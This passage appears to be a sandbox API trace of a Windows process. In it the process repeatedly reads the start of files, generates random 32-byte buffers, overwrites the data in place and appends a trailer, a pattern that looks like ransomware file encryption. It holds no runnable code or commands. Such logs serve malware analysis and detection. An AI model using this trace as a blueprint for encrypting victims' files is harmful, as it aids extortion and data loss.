hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.451] GetProcessHeap () returned 0x280000 [0078.451] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.451] GetProcessHeap () returned 0x280000 [0078.451] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.451] GetProcessHeap () returned 0x280000 [0078.451] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.451] GetProcessHeap () returned 0x280000 [0078.451] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.452] GetProcessHeap () returned 0x280000 [0078.452] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.452] GetProcessHeap () returned 0x280000 [0078.452] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.452] GetProcessHeap () returned 0x280000 [0078.452] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.452] GetProcessHeap () returned 0x280000 [0078.452] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.452] GetProcessHeap () returned 0x280000 [0078.452] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.452] GetProcessHeap () returned 0x280000 [0078.452] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.452] GetProcessHeap () returned 0x280000 [0078.452] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.452] GetProcessHeap () returned 0x280000 [0078.452] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.452] GetProcessHeap () returned 0x280000 [0078.452] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.452] GetProcessHeap () returned 0x280000 [0078.517] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.517] GetProcessHeap () returned 0x280000 [0078.517] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.517] GetProcessHeap () returned 0x280000 [0078.517] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.517] GetProcessHeap () returned 0x280000 [0078.517] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.518] GetProcessHeap () returned 0x280000 [0078.518] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.518] GetProcessHeap () returned 0x280000 [0078.518] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.518] GetProcessHeap () returned 0x280000 [0078.518] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.518] GetProcessHeap () returned 0x280000 [0078.518] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.518] GetProcessHeap () returned 0x280000 [0078.518] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.518] GetProcessHeap () returned 0x280000 [0078.518] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0078.518] GetProcessHeap () returned 0x280000 [0078.518] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.518] GetProcessHeap () returned 0x280000 [0078.518] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0078.518] GetProcessHeap () returned 0x280000 [0078.518] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0078.518] GetProcessHeap () returned 0x280000 [0078.518] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0078.518] GetProcessHeap () returned 0x280000 [0078.518] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0078.518] SetFilePointerEx (in: hFile=0x840, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.518] WriteFile (in: hFile=0x840, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0078.519] WriteFile (in: hFile=0x840, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0078.519] GetProcessHeap () returned 0x280000 [0078.519] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0078.519] GetProcessHeap () returned 0x280000 [0078.519] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0078.519] GetProcessHeap () returned 0x280000 [0078.519] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0078.519] CloseHandle (hObject=0x840) returned 1 [0078.520] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 47 [0078.520] SetFilePointerEx (in: hFile=0x844, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.520] ReadFile (in: hFile=0x844, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0078.520] SetFilePointerEx (in: hFile=0x844, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.520] GetProcessHeap () returned 0x280000 [0078.520] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0078.520] GetProcessHeap () returned 0x280000 [0078.520] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0078.520] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0078.520] GetProcessHeap () returned 0x280000 [0078.520] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0078.520] ReadFile (in: hFile=0x844, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.575] SetFilePointerEx (in: hFile=0x844, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.575] WriteFile (in: hFile=0x844, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x752fd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.575] GetProcessHeap () returned 0x280000 [0078.575] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0078.575] GetProcessHeap () returned 0x280000 [0078.575] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.575] GetProcessHeap () returned 0x280000 [0078.575] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0078.575] GetProcessHeap () returned 0x280000 [0078.575] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.575] GetProcessHeap () returned 0x280000 [0078.575] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.576] GetProcessHeap () returned 0x280000 [0078.576] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.577] GetProcessHeap () returned 0x280000 [0078.577] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.577] GetProcessHeap () returned 0x280000 [0078.577] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.577] GetProcessHeap () returned 0x280000 [0078.577] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.577] GetProcessHeap () returned 0x280000 [0078.577] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.577] GetProcessHeap () returned 0x280000 [0078.577] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.577] GetProcessHeap () returned 0x280000 [0078.577] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.577] GetProcessHeap () returned 0x280000 [0078.577] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.577] GetProcessHeap () returned 0x280000 [0078.577] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.577] GetProcessHeap () returned 0x280000 [0078.577] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.577] GetProcessHeap () returned 0x280000 [0078.578] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.578] GetProcessHeap () returned 0x280000 [0078.578] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.578] GetProcessHeap () returned 0x280000 [0078.578] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.578] GetProcessHeap () returned 0x280000 [0078.578] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.578] GetProcessHeap () returned 0x280000 [0078.578] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.578] GetProcessHeap () returned 0x280000 [0078.578] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0078.578] GetProcessHeap () returned 0x280000 [0078.578] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.578] GetProcessHeap () returned 0x280000 [0078.578] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0078.578] GetProcessHeap () returned 0x280000 [0078.578] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0078.578] GetProcessHeap () returned 0x280000 [0078.578] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0078.578] GetProcessHeap () returned 0x280000 [0078.578] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0078.578] GetProcessHeap () returned 0x280000 [0078.578] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0078.578] GetProcessHeap () returned 0x280000 [0078.578] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0078.578] GetProcessHeap () returned 0x280000 [0078.578] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.578] GetProcessHeap () returned 0x280000 [0078.579] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0078.579] GetProcessHeap () returned 0x280000 [0078.579] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.579] GetProcessHeap () returned 0x280000 [0078.579] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.579] GetProcessHeap () returned 0x280000 [0078.579] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.579] GetProcessHeap () returned 0x280000 [0078.579] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.579] GetProcessHeap () returned 0x280000 [0078.579] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.579] GetProcessHeap () returned 0x280000 [0078.579] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.579] GetProcessHeap () returned 0x280000 [0078.579] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.579] GetProcessHeap () returned 0x280000 [0078.579] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.579] GetProcessHeap () returned 0x280000 [0078.579] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.579] GetProcessHeap () returned 0x280000 [0078.579] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.579] GetProcessHeap () returned 0x280000 [0078.579] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.579] GetProcessHeap () returned 0x280000 [0078.579] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.579] GetProcessHeap () returned 0x280000 [0078.579] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.579] GetProcessHeap () returned 0x280000 [0078.579] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.580] GetProcessHeap () returned 0x280000 [0078.580] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.580] GetProcessHeap () returned 0x280000 [0078.580] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.580] GetProcessHeap () returned 0x280000 [0078.580] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.580] GetProcessHeap () returned 0x280000 [0078.580] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.580] GetProcessHeap () returned 0x280000 [0078.580] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.580] GetProcessHeap () returned 0x280000 [0078.580] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.580] GetProcessHeap () returned 0x280000 [0078.580] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.580] GetProcessHeap () returned 0x280000 [0078.580] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.580] GetProcessHeap () returned 0x280000 [0078.580] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.580] GetProcessHeap () returned 0x280000 [0078.580] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.580] GetProcessHeap () returned 0x280000 [0078.580] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0078.580] GetProcessHeap () returned 0x280000 [0078.580] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.580] GetProcessHeap () returned 0x280000 [0078.580] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0078.580] GetProcessHeap () returned 0x280000 [0078.580] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0078.580] GetProcessHeap () returned 0x280000 [0078.580] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0078.581] GetProcessHeap () returned 0x280000 [0078.581] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0078.581] SetFilePointerEx (in: hFile=0x844, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.581] WriteFile (in: hFile=0x844, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0078.581] WriteFile (in: hFile=0x844, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0078.581] GetProcessHeap () returned 0x280000 [0078.581] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0078.581] GetProcessHeap () returned 0x280000 [0078.581] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0078.581] GetProcessHeap () returned 0x280000 [0078.581] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0078.581] CloseHandle (hObject=0x844) returned 1 [0078.585] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 48 [0078.585] SetFilePointerEx (in: hFile=0x848, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.585] ReadFile (in: hFile=0x848, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0078.585] SetFilePointerEx (in: hFile=0x848, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.585] GetProcessHeap () returned 0x280000 [0078.585] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0078.585] GetProcessHeap () returned 0x280000 [0078.585] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0078.585] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0078.586] GetProcessHeap () returned 0x280000 [0078.586] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0078.586] ReadFile (in: hFile=0x848, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.635] SetFilePointerEx (in: hFile=0x848, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.635] WriteFile (in: hFile=0x848, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x752fd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.635] GetProcessHeap () returned 0x280000 [0078.635] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0078.635] GetProcessHeap () returned 0x280000 [0078.635] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.635] GetProcessHeap () returned 0x280000 [0078.635] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0078.635] GetProcessHeap () returned 0x280000 [0078.635] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.635] GetProcessHeap () returned 0x280000 [0078.635] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0078.635] GetProcessHeap () returned 0x280000 [0078.635] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.635] GetProcessHeap () returned 0x280000 [0078.635] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.635] GetProcessHeap () returned 0x280000 [0078.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.635] GetProcessHeap () returned 0x280000 [0078.635] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.635] GetProcessHeap () returned 0x280000 [0078.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.635] GetProcessHeap () returned 0x280000 [0078.636] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.636] GetProcessHeap () returned 0x280000 [0078.636] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 